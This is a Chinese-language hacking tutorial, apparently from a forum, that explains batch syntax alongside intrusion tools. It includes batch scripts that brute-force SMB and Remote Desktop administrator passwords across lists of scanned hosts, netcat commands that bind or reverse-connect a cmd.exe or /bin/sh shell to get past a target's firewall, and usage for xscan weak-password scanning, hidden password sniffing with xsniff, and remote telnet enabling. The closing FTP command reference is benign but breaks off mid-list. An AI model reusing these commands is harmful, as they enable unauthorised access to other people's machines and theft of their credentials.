echo 用法格式：ok.bat ip
FOR /F %%i IN (D:user.dic) DO smb.exe %1 %%i D:pass.dic 200
存為：ok.exe 說明：輸入一個IP后,用字典文件d:pass.dic來暴解d:user.dic中的用戶密碼,直到文件中值取完為止.%%i為用戶名；%1為輸入的IP地址（默認）.

2：if命令及變數 基本格式：
IF [not] errorlevel 數字 命令語句 如果程序運行返回一個等於或大於指定數字的退出編碼,指定條件為「真」.
例：IF errorlevel 0 命令 指程序執行后返回的值為0時,就值行後面的命令；IF not errorlevel 1 命令指程序執行返回的值不等於1,就執行後面的命令.
0 指發現並成功執行（真）；1 指沒有發現、沒執行（假）.
IF [not] 字元串1==字元串2 命令語句 如果指定的文本字元串匹配（即：字元串1 等於 字元串2）,就執行後面的命令.
例：「if "%2%"=="4" goto start」指：如果輸入的第二個變數為4時,執行後面的命令（注意：調用變數時就%變數名%並加" "）

IF [not] exist 文件名 命令語句 如果指定的文件名存在,就執行後面的命令.
例：「if not nc.exe goto end」指：如果沒有發現nc.exe文件就跳到":end"標籤處.
IF [not] errorlevel 數字 命令語句 else 命令語句或 IF [not] 字元串1==字元串2 命令語句 else 命令語句或 IF [not] exist 文件名 命令語句 else 命令語句 加上：else 命令語句后指：當前面的條件不成立時,就指行else後面的命令.注意：else 必須與 if 在同一行才有效. 當有del命令時需把del命令全部內容用< >括起來,del命令要單獨一行時才能執行,用上< >后就等於是單獨一行了；例如：「if exist test.txt. <del test.txt.> else echo test.txt.missing 」,注意命令中的「.」

（二）系統外部命令(均需下載相關工具)：

1、瑞士軍刀：nc.exe

參數說明：
-h 查看幫助信息
-d 後台模式
-e prog程序重定向,一但連接就執行［危險］
-i secs延時的間隔
-l 監聽模式,用於入站連接
-L 監聽模式,連接天閉后仍然繼續監聽,直到CTR C
-n IP地址,不能用域名
-o film記錄16進位的傳輸
-p[空格]埠 本地埠號
-r 隨機本地及遠程埠
-t 使用Telnet交互方式
-u UDP模式
-v 詳細輸出,用-vv將更詳細
-w數字 timeout延時間隔
-z 將輸入,輸出關掉（用於掃錨時）
基本用法：
nc -nvv 192.168.0.1 80連接到192.168.0.1主機的80埠
nc -l -p 80開啟本機的TCP 80埠並監聽
nc -nvv -w2 -z 192.168.0.1 80-1024掃錨192.168.0.1的80-1024埠
nc -l -p 5354 -t -e c:winntsystem32cmd.exe綁定remote主機的cmdshell在remote的TCP 5354埠
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主機的cmdshell並反向連接192.168.0.2的5354埠
高級用法：

nc -L -p 80作為蜜罐用1：開啟並不停地監聽80埠,直到CTR C為止
nc -L -p 80 > c:log.txt作為蜜罐用2：開啟並不停地監聽80埠,直到CTR C,同時把結果輸出到c:log.txt
nc -L -p 80 < c:honeyport.txt作為蜜罐用3-1：開啟並不停地監聽80埠,直到CTR C,並把c:honeyport.txt中內容送入管道中,亦可起到傳送文件作用
type.exe c:honeyport | nc -L -p 80作為蜜罐用3-2：開啟並不停地監聽80埠,直到CTR C,並把c:honeyport.txt中內容送入管道中,亦可起到傳送文件作用
本機上用：nc -l -p 本機埠
在對方主機上用：nc -e cmd.exe 本機IP -p 本機埠 *win2K
nc -e /bin/sh 本機IP -p 本機埠 *linux,unix 反向連接突破對方主機的防火牆
本機上用：nc -d -l -p 本機埠 < 要傳送的文件路徑及名稱
在對方主機上用：nc -vv 本機IP 本機埠 > 存放文件的路徑及名稱傳送文件到對方主機
備註：
| 管道命令
< 或 > 重定向命令.「<」,例如：tlntadmn < test.txt 指把test.txt的內容賦值給tlntadmn命令
＠ 表示執行＠後面的命令,但不會顯示出來（後台執行）；例：＠dir c:winnt >> d:log.txt 意思是：後台執行dir,並把結果存在d:log.txt中
>與>>的區別 　">"指：覆蓋；">>"指：保存到(添加到）.
如：@dir c:winnt >> d:log.txt和@dir c:winnt > d:log.txt二個命令分別執行二次比較看：用>>的則是把二次的結果都保存了,而用：>則只有一次的結果,是第二次的結果把第一次的覆蓋了.

2、掃錨工具：xscan.exe

基本格式
xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項]掃錨"起始IP到終止IP"段的所有主機信息
xscan -file <主機列表文件名> <檢測項目> [其他選項]掃錨"主機IP列表文件名"中的所有主機信息

檢測項目
-active檢測主機是否存活
-os檢測遠程操作系統類型（通過NETBIOS和SNMP協議）
-port檢測常用服務的埠狀態
-ftp 檢測FTP弱口令
-pub檢測FTP服務匿名用戶寫許可權
-pop3 檢測POP3-Server弱口令
-smtp 檢測SMTP-Server漏洞
-sql檢測SQL-Server弱口令
-smb 檢測NT-Server弱口令
-iis 檢測IIS編碼/解碼漏洞
-cgi檢測CGI漏洞
-nasl載入Nessus攻擊腳本
-all檢測以上所有項目
其它選項
-i 適配器編號 設置網路適配器, <適配器編號>可通過"-l"參數獲取
-l 顯示所有網路適配器
-v 顯示詳細掃描進度
-p 跳過沒有響應的主機
-o跳過沒有檢測到開放埠的主機
　 -t 併發線程數量,併發主機數量 指定最大併發線程數量和併發主機數量, 默認數量為100,10
-log 文件名 指定掃描報告文件名 (後綴為：TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p　 檢測192.168.1.1-192.168.255.255網段內主機的所有漏洞,跳過無響應的主機
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o檢測192.168.1.1-192.168.255.255網段內主機的標準埠狀態,NT弱口令用戶,最大併發線程數量為150,跳過沒有檢測到開放埠的主機
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 檢測「hostlist.txt」文件中列出的所有主機的標準埠狀態,CGI漏洞,最大併發線程數量為200,同一時刻最多檢測5台主機,顯示詳細檢測進度,跳過沒有檢測到開放埠的主機


4、命令行方式嗅探器: xsniff.exe
可捕獲區域網內FTP/SMTP/POP3/HTTP協議密碼
參數說明
-tcp 輸出TCP數據報
-udp 輸出UDP數據報
-icmp 輸出ICMP數據報
-pass 過濾密碼信息
-hide 後台運行
-host 解析主機名

-addr IP地址 過濾IP地址
-port 埠 過濾埠
-log 文件名 將輸出保存到文件
-asc 以ASCII形式輸出
-hex 以16進位形式輸出
用法示例
xsniff.exe -pass -hide -log pass.log 後台運行嗅探密碼並將密碼信息保存在pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1並過濾tcp和udp信息並以ASCII格式輸出


4、終端服務密碼破解: tscrack.exe

參數說明
-h 顯示使用幫助
-v 顯示版本信息
-s 在屏幕上打出解密能力
-b 密碼錯誤時發出的聲音
-t 同是發出多個連接（多線程）
-N Prevent System Log entries on targeted server
-U 卸載移除tscrack組件
-f 使用－f後面的密碼
-F 間隔時間（頻率）
-l 使用－l後面的用戶名
-w 使用－w後面的密碼字典
-p 使用－p後面的密碼
-D 登錄主頁面
用法示例
tscrack 192.168.0.1 -l administrator -w pass.dic遠程用密碼字典文件暴破主機的administrator的登陸密碼
tscrack 192.168.0.1 -l administrator -p 123456用密碼123456遠程登陸192.168.0.1的administrator用戶
@if not exist ipcscan.txt goto noscan
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
nscan
@echo 3389.txt no find or scan faild
(①存為3389.bat) （假設現有用SuperScan或其它掃錨器掃到一批開有3389的主機IP列表文件3389.txt)
3389.bat意思是：從3389.txt文件中取一個IP,接著運行hack.bat
@if not exist tscrack.exe goto noscan
@tscrack %1 -l administrator -w pass.dic >>rouji.txt
:noscan
@echo tscrack.exe no find or scan faild
(②存為hack.bat) (運行3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic與tscrack.exe在同一個目錄下；就可以等待結果了)
hack.bat意思是：運行tscrack.exe用字典暴破3389.txt中所有主機的administrator密碼,並將破解結果保存在rouji.txt文件中.

5、其它：

Shutdown.exe
Shutdown \IP地址 t:2020秒后將對方NT自動關閉（Windows 2003系統自帶工具,在Windows2000下用進就得下載此工具才能用.在前面Windows 2003 DOS命令中有詳細介紹.）
fpipe.exe (TCP埠重定向工具) 在第二篇中有詳細說明（埠重定向繞過防火牆）
fpipe -l 80 -s 1029 -r 80 [url]www.sina.com.cn[/url]當有人掃錨你的80埠時,他掃到的結果會完全是[url]www.sina.com.cn[/url]的主機信息
Fpipe -l 23 -s 88 -r 23 目標IP把本機向目標IP發送的23埠Telnet請求經埠重定向後,就通過88埠發送到目標IP的23埠.（與目標IP建立Telnet時本機就用的88埠與其相連接）然後：直接Telnet 127.0.0.1（本機IP）就連接到目標IP的23埠了.
OpenTelnet.exe (遠程開啟telnet工具)
opentelnet.exe \IP 帳號　密碼　ntlm認證方式　Telnet埠（不需要上傳ntlm.exe破壞微軟的身份驗證方式）直接遠程開啟對方的telnet服務后,就可用telnet \ip 連接上對方.
NTLM認證方式：０：不使用NTLM身份驗證；１：先嘗試NTLM身份驗證,如果失敗,再使用用戶名和密碼；２：只使用NTLM身份驗證.

ResumeTelnet.exe (OpenTelnet附帶的另一個工具)
resumetelnet.exe \IP　帳號　密碼 用Telnet連接完對方后,就用這個命令將對方的Telnet設置還原,並同時關閉Telnet服務.

6、FTP命令詳解：


FTP命令是Internet用戶使用最頻繁的命令之一,熟悉並靈活應用FTP的內部命令,可以大大方便使用者,並收到事半功倍之效.如果你想學習使用進行後台FTP下載,那麼就必須學習FTP指令.

FTP的命令行格式為：
ftp -v -d -i -n -g [主機名] ,其中

-v 顯示遠程伺服器的所有響應信息；

-n 限制ftp的自動登錄,即不使用；.n etrc文件；

-d 使用調試方式；

-g 取消全局文件名.


FTP使用的內部命令如下(中括弧表示可選項):

1.![cmd[args]]：在本地機中執行交互shell,exit回到ftp環境,如：!ls*.zip
2.$ macro-ame[args]： 執行宏定義macro-name.

3.account[password]： 提供登錄遠程系統成功后訪問系統資源所需的補充口令.
4.append local-file[remote-file]：將本地文件追加到遠程系統主機,若未指定遠程系統文件名,則使用本地文件名.

5.ascii：使用ascii類型傳輸方式.
6.bell：每個命令執行完畢後計算機響鈴一次.

7.bin：使用二進位文件傳輸方式.
8.bye：退出ftp會話過程.

9.case：在使用mget時,將遠程主機文件名中的大寫轉為小寫字母.
10.cd remote-dir：進入遠程主機目錄.

11.cdup：進入遠程主機目錄的父目錄.
12.chmod mode file-name：將遠程主機文件file-name的存取方式設置為mode,如：chmod 777 a.out.

13.close：中斷與遠程伺服器的ftp會話(與open對應).
14.cr：使用asscii方式傳輸文件時,將回車換行轉換為回行.

15.delete remote-file：刪除遠程主機文件.
16.debug[debug-value]：設置調試方式, 顯示發送至遠程主機的每條命令,如：deb up 3,若設為0,表示取消debug.

17.dir[remote-dir][local-file]：顯示遠程主機目錄,並將結果存入本地文件.
18.disconnection：同close.

19.form format：將文件傳輸方式設置為format,預設為file方式.
20.get remote-file[local-file]： 將遠程主機的文件remote-file傳至本地硬碟的local-file.

21.glob：設置mdelete,mget,mput的文件名擴展,預設時不擴展文件名,同命令行的-g參數.
22.hash：每傳輸1024位元組,顯示一個hash符號(#).

23.help[cmd]：顯示ftp內部命令cmd的幫助信息,如：help get.
24.idle[seconds]：將遠程伺服器的休眠計時器設為[seconds]秒
25.image：設置二進位傳輸方式(同binary).
26.lcd[dir]：將本地工作目錄切換至dir.

27.ls[remote-dir][local-file]：顯示遠程目錄remote-dir, 並存入本地文件local-file.
28.macdef macro-name：定義一個宏,遇到macdef下的空行時,宏定義結束.

29.mdelete[remote-file]：刪除遠程主機文件.
30.mdir remote-files local-file：與dir類似,但可指定多個遠程文件,如 ：mdir *.o.*.zipoutfile .

31.mget remote-files：傳輸多個遠程文件.
32.mkdir dir-name：在遠程主機中建一目錄.

33.mls remote-file local-file：同nlist,但可指定多個文件名.
34.mode[modename]：將文件傳輸方式設置為modename, 預設為stream方式.

35.modtime file-name：顯示遠程主機文件的修改時間.
36.mput local-file：將多個文件傳輸至遠程主機.

37.newer file-name： 如果遠程機中file-name的修改時間比本地硬碟同名文件的時間更近,則重傳該文件.
38.nlist[remote-dir][local-file]：顯示遠程主機目錄的文件清單,並存入本地硬碟的local-file.

39.nmap[inpattern outpattern]：設置文件名映射機制, 是的文件傳輸時,文件中的某些字元相互轉換, 如：nmap $1.$2.$3[$1,$2].[$2,$3],則傳輸文件a1.a2.a3時,文件名變為a1,a2. 該命令特別適用於遠程主機為非UNIX機的情況.
40.ntrans[inchars[outchars]]：設置文件名字元的翻譯機制,如ntrans1R,則文件名LLL將變為RRR.

41.open host[port]：建立指定ftp伺服器連接,可指定連接埠.
42.passive：進入被動傳輸方式.

43.prompt：設置多個文件傳輸時的交互提示.

44.proxy ftp-cmd：在次要控制連接中,執行一條ftp命令, 該命令允許連接兩個ftp伺服器,以在兩個伺服器間傳輸文件.第一條ftp命令必須為open,以建立兩個伺服器間的連接.
45.put local-file[remote-file]：將本地文件local-file傳送至遠程主機.
46.pwd：顯示遠程主機的當前工作目錄.

47.quit：同bye,退出ftp會話.
48.quote arg1,arg2...：將參數逐字發至遠程ftp伺服器,如：quote syst.

49.recv remote-file[local-file]：同get.
50.reget remote-file[local-file]：類似於get, 但若local-file存在,則從上次傳輸中斷處續傳.

51.rhelp[cmd-name]：請求獲得遠程主機的幫助.
52.rstatus[file-name]：若未指定文件名,則顯示遠程主機的狀態, 否則顯示文件狀態.

53.rename[from][to]：更改遠程主機文件名.
54.reset：清除回答隊列.

55.restart marker：從指定的標誌marker處,重新開始get或put,如：restart 130.
56.rmdir dir-name：刪除遠程主機目錄.

57.runique：設置文件名只一性存儲,若文件存在,則在原文件后加後綴.1, .2等.
58.send local-file[remote-file]：同put.

59.sendport：設置PORT命令的使用.
60.site arg1,arg2...：將參數作為SITE命令逐字發送至遠程ftp主

69.type[type-name]：設置文件傳輸類型為type-name,預設為ascii,如:type binary,設置二進位傳輸方式.
70.umask[newmask]：將遠程伺服器的預設umask設置為newmask,如：umask 3

71.user user-name[password][account]：向遠程主機表明自己的身份,需要口令時,必須輸入口令,如：user anonymous my@email.
72.verbose：同命令行的-v參數,即設置詳盡報告方式,ftp 伺服器的所有響 應都將顯示給用戶,預設為on.

73.?[cmd]：同help.

Tags: